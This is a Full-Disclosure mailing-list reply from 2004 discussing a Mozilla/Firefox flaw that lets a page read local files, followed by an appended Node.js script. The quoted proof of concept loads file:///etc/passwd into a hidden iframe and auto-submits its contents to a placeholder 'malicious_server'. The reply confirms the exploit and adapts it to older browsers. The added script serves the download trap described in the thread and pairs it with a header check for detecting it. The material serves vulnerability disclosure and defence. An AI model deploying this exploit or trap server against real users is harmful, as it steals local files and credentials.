On Mon, 6 Dec 2004, Giovanni Delvecchio wrote:

> PoC:
> ===
>
> Read a local file by innerHTML method:
>
> --------------------------------------------------------
> <HTML>
> <BODY onLoad="ReadFileContent()" >
>
> <iframe name="local_file" src="file:///etc/passwd" height=0
> width=0></iframe>
>
> <form name="module" method="post" action="http://malicious_server/grab.php"
> ENCTYPE="text/plain">
> <input name="content" type="hidden" size="300" >
> </form>
>
> <script>
>
> function ReadFileContent(){
>
>   alert(local_file.document.all(0).innerHTML);
>
>   document.module.content.value+=local_file.document.all(0).innerHTML;
>   //send content to malicious_server
>   document.module.submit();
> }
>
> </script>
> </body>
> </html>
While I can confirm that this works with FF 1.0, older versions like 0.9.3 and Mozilla 1.7.3 choked on document.all, which isn't really supported by Mozilla's DOM. I got it to work with document.firstChild:

---
<HTML>
<BODY onLoad="ReadFileContent()" >

<iframe id="local_file" name="local_file" src="file:///etc/passwd" height=0 width=0>
</iframe>

<script>
function ReadFileContent(){
  alert(local_file.document.firstChild.innerHTML);
}
</script>
</body></html>
---

This worked with all versions of Mozilla and Firefox I checked.

> Possible method of remote exploitation:
> ================================
>
> Question:
> How could a malicious remote user exploit it ?
>
> My idea is the following:
> After the user "victim" has requested
> http://malicious_server/page.htm,
> if malicious_server responds with a page containing an unknown
> Content-Type
> field (for example text/html. , note the dot), the browser will show a
> dialog window with some options (open, save, cancel). Choosing "Open" to
> view this page, it will be downloaded and opened locally; JavaScript
> code will be executed in local context.

I am offered to "Open with GNU Emacs (default)" under Linux -- but this may have been configured by me a long time ago.

On Windows, I can have the default opener set to my browser by adding:

Content-Disposition: attachment; filename=cttest.html

(the .html is important).

bye, ju

--
Juergen Schmidt       Chefredakteur heise Security     www.heisec.de
Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover
Tel. +49 511 5352 300 FAX +49 511 5352 417   EMail [EMAIL PROTECTED]
GPG-Key: 0x38EA4970, 5D7B 476D 84D5 94FF E7C5 67BE F895 0A18 38EA 4970

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
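Added example, not part of the thread and not Giovanni's or Juergen's code: a Node.js script that serves the download trap the way the thread describes it (a Content-Type the browser does not know, plus Content-Disposition: attachment with an .html filename so the saved file is opened by the browser in file:// context), and beside it the check a proxy or IDS could run over response headers to flag exactly that combination. The port, the allowlist of media types assumed to render inline, the sample page body and the filename are assumptions for illustration; what a particular 2004 browser rendered inline is not something this script knows.

```javascript
// Added example (not from the thread): the "download trap" delivery from the
// thread, served by Node.js, and a header classifier that flags it.
// Assumptions: port 8080, the RENDERABLE allowlist, the body and filename.

// Constructed sample body; a real trap would carry the PoC page.
const TRAP_BODY = '<html><body onload="alert(location.href)">trap</body></html>';

// Headers as described in the thread: a Content-Type the browser does not
// know ("text/html." with a trailing dot) so it prompts instead of rendering,
// and Content-Disposition: attachment with an .html filename so the file is
// saved under an extension the browser itself opens (file:// context).
function trapHeaders(filename) {
  return {
    'Content-Type': 'text/html.',
    'Content-Disposition': 'attachment; filename=' + filename,
  };
}

// Case-insensitive header lookup (proxy logs and Node lower-case names).
function getHeader(headers, name) {
  const want = name.toLowerCase();
  const key = Object.keys(headers).find((k) => k.toLowerCase() === want);
  return key === undefined ? undefined : headers[key];
}

// Assumed allowlist of media types the protected client renders inline.
// Anything else is treated as "goes to disk / prompts".
const RENDERABLE = new Set([
  'text/html', 'text/plain', 'text/xml', 'image/gif', 'image/jpeg', 'image/png',
]);

// "type/subtype" lower-cased, parameters dropped; null when absent or no slash.
function mediaTypeEssence(value) {
  if (typeof value !== 'string') return null;
  const essence = value.split(';')[0].trim().toLowerCase();
  return essence.includes('/') ? essence : null;
}

// Parses `attachment; filename="a b.html"` or `inline; filename=x.txt`.
// Returns { type, filename } (filename undefined when absent) or null.
function parseContentDisposition(value) {
  if (typeof value !== 'string') return null;
  const parts = value.split(';').map((p) => p.trim());
  const out = { type: parts[0].toLowerCase(), filename: undefined };
  for (const p of parts.slice(1)) {
    const eq = p.indexOf('=');
    if (eq < 0) continue;
    const name = p.slice(0, eq).trim().toLowerCase();
    let val = p.slice(eq + 1).trim();
    if (val.length >= 2 && val.startsWith('"') && val.endsWith('"')) val = val.slice(1, -1);
    if (name === 'filename') out.filename = val;
  }
  return out;
}

// download:  the response would prompt or be saved rather than render.
// localHtml: and the name it lands on disk under is .htm/.html, i.e. the
//            combination the thread abuses to get script run in local context.
function classifyResponse(headers, urlPath = '/') {
  const essence = mediaTypeEssence(getHeader(headers, 'content-type'));
  const cd = parseContentDisposition(getHeader(headers, 'content-disposition'));
  const download =
    (cd !== null && cd.type === 'attachment') || essence === null || !RENDERABLE.has(essence);
  const savedName = (cd && cd.filename) || urlPath.split('/').pop() || '';
  const localHtml = download && /\.html?$/i.test(savedName);
  return { download, localHtml, mediaType: essence, savedName };
}

// Serves the trap on the given port. http is loaded here so the classifier
// above needs neither the module nor the network.
function startTrapServer(port) {
  const http = require('http');
  const server = http.createServer((req, res) => {
    res.writeHead(200, trapHeaders('cttest.html'));
    res.end(TRAP_BODY);
  });
  server.listen(port);
  return server;
}

// Only bind a socket when explicitly asked: `node trap.js --serve`.
if (process.argv.includes('--serve')) {
  startTrapServer(8080);
  console.log('trap server listening on http://127.0.0.1:8080/ (Ctrl-C to stop)');
}
```

`node trap.js --serve` starts the server; fetching any path from it with a 2004-era client should reproduce the prompt described in the thread, while the classifier itself runs offline on header objects. The allowlist is deliberately short and is the knob to tune: the check is only as good as your knowledge of what the client renders inline, and a response with no Content-Type at all is treated here as a download, which is a conservative assumption rather than observed browser behaviour.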